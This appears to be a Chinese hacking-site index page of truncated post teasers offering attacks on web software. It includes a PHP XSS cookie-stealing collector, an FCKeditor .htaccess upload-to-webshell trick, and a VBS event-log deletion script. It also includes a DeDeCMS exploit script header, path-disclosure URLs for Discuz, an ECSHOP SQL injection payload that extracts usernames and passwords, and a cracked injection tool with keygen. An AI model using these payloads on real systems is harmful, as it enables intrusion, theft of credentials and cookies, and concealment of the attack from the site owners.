域名劫持攻击的几大步骤
1、 获得要劫持的域名注册信息 攻击者会先访问网络解决方案公司www.networksolutions.com,通过该公司主页面所提供MAKE CHANGES功能,输入要查询的域名,获得该域名注册信息以abc。com为例,我们将获得以下信息: Registrant: Capital Cities/ABC,Inc (ABC10-DOM) 77 W 66th St。 New York, NY...
XSS获取远程路径并发送到邮件
不解释! <?php $ip = $_SERVER['REMOTE_ADDR']; ; $referer = $_SERVER['HTTP_REFERER']; $cookie = $_GET['c']; $agent = $_SERVER['HTTP_USER_AGENT']; $subject='远程XSS获取地址-域名:'.$referer; $body="<p&g...
FCKeditor上传Getshell不要忘记htaccess
有些服务器开启了.htaccess文件上传,那么经常碰到fckeditor的就可以利用该文件上传一个phpshell。 1.创建一个.htaccess文件,内容如下: <FilesMatch "_php.gif"> SetHandler application/x-httpd-php </FilesMatch> 2.上传shell ...
日志的伪造
删除日志VBS: cleanevent.vbs strComputer = "主机名字By foolishqiang" Set objWMIService = GetObject("winmgmts:" _ & "{impersonationLevel=impersonate,(Backup)}!\\" & _ strComputer & "\root\cimv2") di...
PHP系统暴绝对路径的方法收集
1、加引号'这个最常用 2、变参数类型,比如把id=1改为id=a等 有时很有效果 3、乱添数据,比如把id=1改为id=1111111111111111111111......等 有时很有效果 4、text.php?aa[]=xx 5、利用php的max_execution_time, 能将绝对路径显示出来. 这机率非常小.适合在服务器负荷...
DeDeCMS(织梦)变量覆盖0day getshell
#!usr/bin/php -w <?php error_reporting(E_ERROR); set_time_limit(0); print_r(' DEDEcms Variable Coverage Exploit Author: [url]www.heixiaozi.com[/url] [url]www.webvul.com[/url] ); echo "\r\n"; if($ar...
DZ 7.2最新版爆路径0day
这里只是说下方法,在要爆DZ 7.2 bbs的网站后面加上以下代码访问,即可爆出。"manyou/admincp.php?my_suffix=%0A%0DTOBY57",引号不算。 例如:https://www.webshell.cc/manyou/admincp.php?my_suffix=%0A%0DTOBY57
穿山甲注入工具Pangolin.Professinal.Edition.v3.2.5.1137专业版加注册机发布
图改天在上吧!先上附件。 绝对的好用不出错不是破解版哦! 下载:停止下载
ECSHOP 搜索注入漏洞出现错误的解决办法!
ECSHOP 利用网上的EXP: search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjd...
PHP base64_decode 的两种破解方法
实际应用: 首先,打开你的文本编辑器,比如记事本,新建一个文本文件,按照那个解密代码,把我的那个footer.php文件里的密码输入进去,然后就类似下面: <?php $Code = 'bZA7b8MwDIR3/wpCQ9MudtCpaPxYOmTo1gIZC9mibSGyKEiM1QD98fUjWVovBHQ83n1QVSa50iM0RoZQiJaI0Yst8Yu/eV7UHrJynclD...